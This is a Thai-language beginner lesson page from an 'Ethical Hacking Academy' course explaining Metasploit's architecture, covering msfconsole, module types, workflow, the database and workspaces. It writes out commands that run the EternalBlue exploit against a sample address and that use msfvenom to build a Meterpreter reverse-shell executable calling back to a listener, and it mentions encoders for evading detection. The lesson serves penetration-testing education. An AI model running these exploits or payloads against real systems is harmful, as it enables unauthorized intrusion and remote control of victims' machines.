สถาปัตยกรรม Metasploit
มอดูลและคอนโซล
สถาปัตยกรรม Metasploit เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
Metasploit คืออะไร
Metasploit เป็นเฟรมเวิร์กสำหรับใช้ประโยชน์จากช่องโหว่ที่ได้รับความนิยมมากที่สุด โดยมีคลัง exploit, payload และเครื่องมือที่จัดเป็นระบบ สำหรับทดสอบและสาธิตช่องโหว่ระหว่างการปฏิบัติงานที่ได้รับอนุญาต
แทนที่จะเขียนการโจมตีทุกครั้งตั้งแต่ต้น คุณสามารถโหลดโมดูลที่ผ่านการพิสูจน์แล้ว กำหนดค่า และเรียกใช้ผ่านอินเทอร์เฟซที่สม่ำเสมอ
msfconsole
อินเทอร์เฟซหลักคือ msfconsole ซึ่งเป็นเชลล์บรรทัดคำสั่งแบบโต้ตอบ โดยมีการเติมคำสั่งอัตโนมัติด้วยปุ่มแท็บ ประวัติคำสั่ง และการเข้าถึงทุกโมดูล
คุณเปิดใช้งานจากเทอร์มินัล แล้วทำงานทั้งหมดภายในพรอมต์ของโปรแกรม
msfconsole
# msf6 > helpประเภทของโมดูล
Metasploit จัดความสามารถต่าง ๆ เป็นประเภทของโมดูล:
- exploit: โค้ดที่ใช้ประโยชน์จากช่องโหว่
- payload: โค้ดที่ทำงานบนเป้าหมายหลังใช้ประโยชน์จากช่องโหว่
- auxiliary: เครื่องมือสแกน เครื่องมือทดสอบอินพุตผิดรูปแบบ และเครื่องมือที่ไม่ส่ง payload
- post: การดำเนินการหลังการเจาะระบบบนโฮสต์ที่ถูกบุกรุก
- encoder และ nop: ช่วยให้ payload หลีกเลี่ยงการตรวจจับ
การตั้งชื่อโมดูล
โมดูลใช้เส้นทางแบบลำดับชั้นที่บอกอย่างชัดเจนว่าโมดูลทำอะไร การอ่านเส้นทางจะเผยให้เห็นประเภท แพลตฟอร์ม และบริการเป้าหมาย
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitExploit กับ Payload
ข้อแตกต่างสำคัญมีดังนี้:
- exploit คือช่องทางเข้าสู่ระบบ โดยใช้ทำลายซอฟต์แวร์ที่มีช่องโหว่
- payload คือสิ่งที่คุณต้องการให้เกิดขึ้นเมื่อเข้าระบบได้แล้ว เช่น การเปิดเชลล์
คุณต้องจับคู่ทั้งสองอย่างเข้าด้วยกัน: exploit หนึ่งรายการสามารถส่ง payload ได้หลายแบบ ขึ้นอยู่กับเป้าหมายและระบบเป้าหมาย
ลำดับการทำงานกับโมดูล
การทำงานกับโมดูลใด ๆ จะเป็นไปตามวงจรที่ทำซ้ำได้:
- search เพื่อค้นหาโมดูล
- use เพื่อโหลดโมดูล
- กำหนดตัวเลือก เช่น RHOSTS และ LHOST
- run หรือ exploit โมดูล
ความสม่ำเสมอนี้คือเหตุผลที่เฟรมเวิร์กสามารถขยายการทำงานครอบคลุมโมดูลนับพันรายการได้
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitคลังข้อมูลและตัวเลือก
การตั้งค่าโมดูลจะอยู่ในคลังข้อมูล ตัวเลือกแต่ละรายการอาจเป็นสิ่งจำเป็นหรือไม่จำเป็นก็ได้
- RHOSTS: ที่อยู่ของเป้าหมายระยะไกล
- RPORT: พอร์ตระยะไกล
- LHOST: ที่อยู่สำหรับรับการเชื่อมต่อย้อนกลับ
- LPORT: พอร์ตสำหรับรับการเชื่อมต่อ
ใช้ show options เพื่อดูว่าโมดูลต้องการสิ่งใดก่อนเรียกใช้
ฐานข้อมูล
Metasploit ทำงานร่วมกับฐานข้อมูล PostgreSQL เพื่อจัดเก็บโฮสต์ บริการ ข้อมูลที่ยึดมาได้ และข้อมูลรับรองที่ค้นพบระหว่างการปฏิบัติงาน ซึ่งช่วยให้คุณติดตามขอบเขตงานขนาดใหญ่ได้อย่างมีประสิทธิภาพ
เริ่มการทำงานของฐานข้อมูลก่อนเปิดคอนโซล เพื่อให้ระบบบันทึกผลลัพธ์โดยอัตโนมัติ
msfdb init
# Inside msfconsole:
# db_status hosts services credsโมดูลเสริม
โมดูล Auxiliary ทำงานที่เป็นประโยชน์โดยไม่ต้องใช้ประโยชน์จากช่องโหว่ เช่น การสแกนพอร์ต การแจกแจงบริการ การเดารหัสผ่านเพื่อเข้าสู่ระบบแบบลองทุกความเป็นไปได้ และการทดสอบอินพุตผิดรูปแบบ
โมดูลเหล่านี้มักเป็นขั้นตอนแรกของคุณ ใช้รวบรวมข้อมูลที่จำเป็นก่อนเลือก exploit
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom เป็นเครื่องมือคู่หูสำหรับสร้าง payload แบบอิสระเป็นไฟล์ ได้แก่ ไฟล์ปฏิบัติการ สคริปต์ หรือ shellcode ที่คุณส่งไปทำงานนอกคอนโซล
เครื่องมือนี้รวมการสร้าง payload และการเข้ารหัสไว้ในคำสั่งเดียว เหมาะสำหรับการจำลองฟิชชิงหรือการส่งมอบแบบกำหนดเองในการทดสอบที่ได้รับอนุญาต
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeพื้นที่ทำงาน
สำหรับการปฏิบัติงานหลายรายการ พื้นที่ทำงานของ Metasploit จะแยกโฮสต์ บริการ และข้อมูลที่ยึดมาได้ของลูกค้าแต่ละรายไว้ในฐานข้อมูล คุณสามารถสลับไปมาระหว่างพื้นที่เหล่านี้ เพื่อไม่ให้ข้อมูลปะปนกันระหว่างการประเมิน
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allตรวจสอบอย่างรวดเร็ว
ทดสอบความเข้าใจเกี่ยวกับประเภทของโมดูล
สรุปทบทวน
คุณได้เรียนรู้สถาปัตยกรรมของ Metasploit:
- msfconsole คืออินเทอร์เฟซหลัก ส่วน msfvenom ใช้สร้าง payload แบบอิสระ
- ประเภทของโมดูล: exploit, payload, auxiliary, post, encoder/nop
- เส้นทางของโมดูลระบุประเภท/แพลตฟอร์ม/บริการ
- ลำดับการทำงาน: search, use, set options, run โดยการตั้งค่าจะอยู่ในคลังข้อมูล
- ฐานข้อมูล PostgreSQL ติดตามโฮสต์ บริการ และข้อมูลที่ยึดมาได้
ถัดไป: การค้นหาและใช้ exploit อย่างมีประสิทธิภาพ
คำถามที่พบบ่อย
บทเรียน “สถาปัตยกรรม Metasploit” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “สถาปัตยกรรม Metasploit” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “สถาปัตยกรรม Metasploit”
มอดูลและคอนโซล คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน
บทเรียน “สถาปัตยกรรม Metasploit” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม
ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit
- การค้นหาและใช้ช่องโหว่
- เพย์โหลดและ Meterpreter
- มอดูลหลังการโจมตี